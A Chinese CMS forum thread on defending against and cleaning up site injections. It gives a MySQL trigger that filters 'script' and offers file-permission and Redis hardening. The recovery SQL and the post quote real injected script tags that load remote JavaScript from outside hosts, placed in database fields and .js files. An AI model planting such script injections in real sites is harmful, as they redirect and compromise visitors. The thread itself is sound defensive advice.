『大发网盟』

收益高、结算快、超稳定,直营无中间商差价

『1866资源网』

全网最早的资源,实力雄厚,速度超快,超稳定

『78免费网盘』

永久免费的多媒体转码与云分发平台,无限存储

『209资源网』

全网唯一一家全亚洲服务器加速播放,速度超快

『推荐模板服务商』

海洋CMS官方推荐可信赖模板制作服务商家

【分享】被频繁挂马怎么办?两招解决问题

星源影视 2月前 888

 1.数据库挂马防御

     利用SQL触发器监控更新操作进行过滤。

   

IF 
   INSTR( NEW.v_name,'script')> 0   OR 
   INSTR( NEW.v_pic,'script')> 0    OR
   INSTR( NEW.v_spic,'script')> 0    OR
   INSTR( NEW.v_actor,'script')> 0
THEN
  SIGNAL SQLSTATE 'HY000' SET MESSAGE_TEXT = '请勿输入非法字符!';
END IF

效果:


恢复方法(替换为被挂代码):

update sea_data set v_pic = replace(v_pic,'"></script><script/**/src=https://www.qiuxiazx.com/data/velists.txt></script><a a="','')


具体参考: https://www.seacms.net/thread-8116.htm

2.文件挂马防御

       1. 全部文件权限设置为555,"uploads"和"/data/cache"目录除外

         2. 缓存使用redis(内存)缓存。

具体方法是:

 1. 设置网站根目录权限为555,包含子目录

     

2.进去网站目录,设置"uploads"和"/data/cache“设置为755。

         备注:此方法要求是生产环境下,也就是网站已经配置完毕不需要修改的。

          排行榜和最近更新的生成请参考 diy万能模板之妙用

 3. 使用Redis缓存

  1.安装Redis服务



2.安装Redis扩展 

3.设置使用Redis缓存

  

 恢复方法:

          利用宝塔插件 :

 

 

另外,对"/js/*.js" 文件也可能会进行感染 ,跳福利社是它的表现特征,也需要检查。

感染代码稍有不同:

document.write("</script><script src=https://cs.mazwei.com/data/admin/ile.js></script>")

参考链接:★〓★海洋CMS★〓★ 数据库挂马防范及恢复方法(2019.8.8 更新)

扩展思考:网站被挂马好解决,如果是人发生疾病或意外呢?如何预防?

示范网站:星源影视


最后于 2月前 被星源影视编辑 ,原因:
最新回复 (10)
  • johnny 2月前
    0 引用 2
    PC端解决,移动端还是有 福利社跳转。怎么破?
  • johnny 2月前
    0 引用 3
    使用 Redis缓存,网站无法打开
  • 星源影视 2月前
    0 引用 4
    johnny 使用 Redis缓存,网站无法打开

    没有正确安装Redis,有个服务还需要在php插件里安装



  • 星源影视 2月前
    0 引用 5
    johnny PC端解决,移动端还是有 福利社跳转。怎么破?

    挂马本来都只是移动端才跳,未清理干净恶意代码。

    用最新程序覆盖或者备份数据库重新安装,然后恢复数据库。

  • 星源影视 2月前
    0 引用 6
    johnny PC端解决,移动端还是有 福利社跳转。怎么破?

    未清理干净,检测数据库是不是还有挂马未清理,用最新程序覆盖。

  • johnny 2月前
    0 引用 7
    可能我之前按错PHP版本了,感谢

    但是移动端首页跳转福利社还是不知道怎么解决!
  • 星源影视 2月前
    0 引用 8
    johnny 可能我之前按错PHP版本了,感谢 但是移动端首页跳转福利社还是不知道怎么解决!
    你的网站看下
  • johnny 2月前
    0 引用 9
    QQ656562339
  • 0 引用 10
    工具栏里的 触发器如何添加。还是我的版本问题。没看到有这个 触发器 按钮.
  • 星源影视 2月前
    0 引用 11
    恒久快乐 工具栏里的 触发器如何添加。还是我的版本问题。没看到有这个 触发器 按钮.
    版本问题吧,这个是phpmyadmin带的功能,需要mysql5.5+ 
返回
发新帖